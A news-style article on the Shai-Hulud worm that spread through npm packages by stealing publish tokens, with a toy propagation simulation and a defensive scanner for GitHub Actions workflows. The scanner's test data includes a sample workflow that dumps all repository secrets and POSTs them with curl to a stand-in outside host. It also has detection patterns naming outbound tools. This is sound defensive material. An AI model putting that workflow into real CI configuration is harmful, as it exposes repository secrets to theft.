
Self-Replicating Malware 'Shai-Hulud' Infects 187 NPM Packages, Compromising Credentials

The Shai-Hulud worm is wreaking havoc on the NPM registry. With the potential to restart attacks and compromise more packages, it's a wake-up call for improved security measures.


The NPM registry, a vital hub for JavaScript developers, is contending with self-replicating malware dubbed Shai-Hulud. The worm has infiltrated at least 187 packages, compromising maintainer accounts and stealing credentials. The attack began days after a phishing campaign targeting NPM developers.

The Shai-Hulud worm propagates using stolen NPM authentication tokens. Once it runs on a developer's machine, it uses that developer's token to copy its malicious code into the 20 most popular packages the developer can publish to and pushes new versions of them. Every maintainer who installs one of those versions runs the worm in turn, so the infection cascades. That also means a single account that is still compromised, for example because its token was never rotated, can restart the spread, and an account that owns widely installed packages acts as a super-spreader.
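To make the cascade concrete, here is a toy simulation of the propagation model described above. It is an added example, not code from the article or from the worm: the registry, the download counts and the install graph are all constructed, and the "top N" cutoff is reduced from 20 to 2 so the trace fits on a page. The point it shows is that the blast radius depends on who installs whose packages, not on which account the phish landed on first, and that re-seeding from one un-rotated token reproduces the whole cascade.

```javascript
// Added example (not from the article): a toy simulation of the cascading
// propagation described above. All data below is constructed for illustration.
//
// Model: a stolen npm publish token lets the worm push a trojaned version of
// the maintainer's TOP_N most-downloaded packages. Every maintainer who installs
// a trojaned package runs the worm on their own machine, loses their token and
// becomes a new publisher of trojaned packages. The spread stops only when no
// newly compromised maintainer owns a package that reaches an uncompromised one.

const TOP_N = 2; // the real worm used 20; small here so the trace is readable

// Constructed registry: package -> { owner, downloads }
const registry = {
  'color-helpers': { owner: 'alice', downloads: 9000 },
  'alice-utils':   { owner: 'alice', downloads: 500 },
  'alice-old':     { owner: 'alice', downloads: 10 },   // below alice's top N
  'bob-cli':       { owner: 'bob',   downloads: 3000 },
  'bob-lib':       { owner: 'bob',   downloads: 200 },
  'carol-widget':  { owner: 'carol', downloads: 50 },
  'dave-isolated': { owner: 'dave',  downloads: 100000 },
};

// Constructed install graph: maintainer -> packages their own projects install
const installs = {
  alice: ['bob-lib'],
  bob:   ['color-helpers'],
  carol: ['color-helpers', 'bob-cli'],
  dave:  [],              // installs nothing from the others: unreachable
  erin:  ['alice-old'],   // depends only on a package outside alice's top N
};

// The packages the worm would republish with a given maintainer's token.
function topPackages(owner, n, reg = registry) {
  return Object.entries(reg)
    .filter(([, meta]) => meta.owner === owner)
    .sort((a, b) => b[1].downloads - a[1].downloads)
    .slice(0, n)
    .map(([name]) => name);
}

// Run the worm to a fixpoint from the maintainers whose tokens were stolen
// (e.g. by the phishing campaign that preceded the worm).
function simulate(seedMaintainers, { topN = TOP_N, reg = registry, inst = installs } = {}) {
  const compromised = new Set(seedMaintainers);
  const trojaned = new Set();
  const queue = [...seedMaintainers];
  while (queue.length) {
    const m = queue.shift();
    for (const pkg of topPackages(m, topN, reg)) trojaned.add(pkg);
    // anyone who installs any trojaned package runs the worm and loses their token
    for (const [victim, deps] of Object.entries(inst)) {
      if (compromised.has(victim)) continue;
      if (deps.some((d) => trojaned.has(d))) {
        compromised.add(victim);
        queue.push(victim);
      }
    }
  }
  return {
    maintainers: [...compromised].sort(),
    packages: [...trojaned].sort(),
  };
}

// Phish lands on bob: alice and carol are pulled in through bob's packages,
// erin and dave are not reachable. Re-seeding from alice alone (an un-rotated
// token after cleanup) trojans exactly the same five packages.
console.log(simulate(['bob']));
console.log(simulate(['alice']));
console.log(simulate(['dave'])); // one package trojaned, nobody else reached
```

Swap in a real dependency graph (for instance from `npm view <pkg> dependents` data) and the same walk gives a rough blast-radius estimate for a single leaked token, which is the number a maintainer should have in mind when deciding how long a publish token may live.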

The attack has had substantial impact. CrowdStrike, for instance, had at least 25 of its NPM packages compromised; the NPM registry swiftly removed them. Davies Meyer, another company, had at least 25 npm packages affected, including high-traffic packages such as @ctrl/tinycolor. On each infected machine the worm runs TruffleHog to hunt for exposed credentials and access tokens, and it attempts to create new GitHub Actions workflows that publish any stolen secrets.
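The GitHub Actions behaviour above leaves a detectable artifact in the repository itself: a workflow that reads secrets and sends them somewhere other than GitHub or the registry. The scanner below is an added example, not code from the article or from any incident-response tool, and the two workflow files it inspects are constructed. It is a heuristic (a workflow can exfiltrate without matching these patterns), so treat a hit as a triage signal rather than a verdict, and pair it with a review of every workflow file added or modified since the compromise window began.

```javascript
// Added example (not from the article): a heuristic scan over GitHub Actions
// workflow files for the pattern described above, a job that reads repository
// secrets and ships them to an outside host. Workflow texts are constructed.

// Matches both a single secret (${{ secrets.NPM_TOKEN }}) and a dump of all
// of them (${{ toJSON(secrets) }}).
const SECRET_REF = /\$\{\{[^}]*\bsecrets\b[^}]*\}\}/g;
const URL_RE = /https?:\/\/([A-Za-z0-9.-]+)/g;
// Commands that typically carry data off the runner.
const OUTBOUND_CMD = /\b(curl|wget|Invoke-WebRequest|fetch)\b/;
// Hosts a workflow is expected to talk to; anything else is "outside".
const TRUSTED_HOSTS = new Set(['github.com', 'api.github.com', 'registry.npmjs.org']);

// Returns the secret references found, the non-trusted hosts that an outbound
// command targets, and whether both are present (the exfiltration shape).
function scanWorkflow(text) {
  const secretRefs = [...new Set(text.match(SECRET_REF) || [])];
  const outboundHosts = new Set();
  for (const line of text.split('\n')) {
    if (!OUTBOUND_CMD.test(line)) continue;
    for (const m of line.matchAll(URL_RE)) {
      const host = m[1].toLowerCase();
      if (!TRUSTED_HOSTS.has(host)) outboundHosts.add(host);
    }
  }
  return {
    secretRefs,
    outboundHosts: [...outboundHosts].sort(),
    suspicious: secretRefs.length > 0 && outboundHosts.size > 0,
  };
}

// Constructed: an ordinary publish workflow. It uses a secret, but only hands
// it to npm, so it should not fire.
const BENIGN_WORKFLOW = `
name: release
on: [push]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: \${{ secrets.NPM_TOKEN }}
`;

// Constructed: the exfiltration shape, every secret serialised into an env var
// and POSTed to an outside host.
const EXFIL_WORKFLOW = `
name: build
on: push
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - run: |
          curl -X POST -d "$ALL_SECRETS" https://collector.example.invalid/collect
        env:
          ALL_SECRETS: \${{ toJSON(secrets) }}
`;

console.log(scanWorkflow(BENIGN_WORKFLOW)); // suspicious: false
console.log(scanWorkflow(EXFIL_WORKFLOW));  // suspicious: true, host collector.example.invalid
```

Run it over `.github/workflows/*.yml` in every repository the compromised account could push to, and extend `TRUSTED_HOSTS` with the internal endpoints your own workflows legitimately call so that the only remaining hits are worth a human's time.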

The Shai-Hulud attack underscores the urgent need for stronger security measures in the NPM ecosystem. Nicholas Weaver, a researcher with the International Computer Science Institute, recommends moving to a publication model in which every publish request requires explicit human approval confirmed with a phish-proof 2FA method, so that a stolen token alone cannot push a new version. CrowdStrike has taken steps to contain the incident, removing the malicious packages and rotating its keys in public registries. However, the full extent of the damage and the number of affected packages remain under investigation.
